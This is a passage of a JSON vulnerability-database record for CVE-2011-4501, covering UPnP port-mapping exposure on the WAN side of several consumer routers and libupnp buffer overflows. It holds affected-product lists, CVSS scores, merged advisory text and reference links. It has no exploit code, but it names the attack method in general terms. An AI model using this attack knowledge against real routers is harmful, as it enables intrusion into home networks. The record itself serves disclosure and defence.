"trust": 1.0,
"vendor": "edimax",
"version": null
},
{
"model": "lb000021",
"scope": "eq",
"trust": 1.0,
"vendor": "sweex",
"version": null
},
{
"model": "cn-wf514 router",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "6114wg router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "1.83"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.9,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "cn-wf512",
"scope": null,
"trust": 0.8,
"vendor": "canyon",
"version": null
},
{
"model": "cn-wf512 router",
"scope": "eq",
"trust": 0.8,
"vendor": "canyon",
"version": "1.83"
},
{
"model": "cn-wf514",
"scope": null,
"trust": 0.8,
"vendor": "canyon",
"version": null
},
{
"model": "cn-wf514 router",
"scope": "eq",
"trust": 0.8,
"vendor": "canyon",
"version": "2.08"
},
{
"model": "br-6104k",
"scope": null,
"trust": 0.8,
"vendor": "edimax",
"version": null
},
{
"model": "br-6104k router",
"scope": "lt",
"trust": 0.8,
"vendor": "edimax",
"version": "3.25"
},
{
"model": "br-6114wg",
"scope": null,
"trust": 0.8,
"vendor": "edimax",
"version": null
},
{
"model": "br-6114wg router",
"scope": null,
"trust": 0.8,
"vendor": "edimax",
"version": null
},
{
"model": "wl-153",
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": "wl-153 router",
"scope": "lt",
"trust": 0.8,
"vendor": "sitecom",
"version": "1.39"
},
{
"model": "lb000021",
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:edimax:br-6104k_router_firmware:3.21:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:edimax:br-6104k:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:canyon-tech:cn-wf512_router_firmware:1.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:canyon-tech:cn-wf514_router_firmware:2.08:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:canyon-tech:cn-wf514:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canyon-tech:cn-wf512:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:edimax:6114wg_router_firmware:1.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:edimax:6114wg_router_firmware:2.08:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:edimax:6114wg:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sitecom:wl-153_router_firmware:1.34:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:sitecom:wl-153_router_firmware:1.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sitecom:wl-153:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sweex:lb000021_router_firmware:3.15:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sweex:lb000021:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4501"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4501",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4501",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-52446",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4501",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-363",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-52446",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation in Edimax EdiLinux on the Edimax BR-6104K with firmware before 3.25, Edimax 6114Wg, Canyon-Tech CN-WF512 with firmware 1.83, Canyon-Tech CN-WF514 with firmware 2.08, Sitecom WL-153 with firmware before 1.39, and Sweex LB000021 with firmware 3.15 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. Vulnerabilities exist in the UPnP IGD installation and enablement of Edimax EdiLinux for various versions of Edimax. This vulnerability is related to the \\\"external forwarding\\\" vulnerability. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. \n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4501",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5058",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52446",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"id": "VAR-201111-0180",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "VULHUB",
"id": "VHN-52446"
}
],
"trust": 1.3453724428571427
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5058"
}
]
},
"last_update_date": "2023-12-18T12:09:29.878000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.canyon-tech.com/"
},
{
"title": "BR-6104K",
"trust": 0.8,
"url": "http://www.edimax.com/en/produce_detail.php?pd_id=58\u0026pl1_id=3\u0026pl2_id=18"
},
{
"title": "BR-6114Wg",
"trust": 0.8,
"url": "http://www.edimax.co.uk/en/produce_detail.php?pd_id=146\u0026pl1_id=1\u0026pl2_id=48"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.sitecom.com/"
},
{
"title": "LB000021",
"trust": 0.8,
"url": "http://www.sweex.com/en/assortiment/internet-networking/routers/lb000021/"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5058)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6019"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.8,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 1.7,
"url": "http://www.upnp-hacks.org/suspect.html"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4501"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4501"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
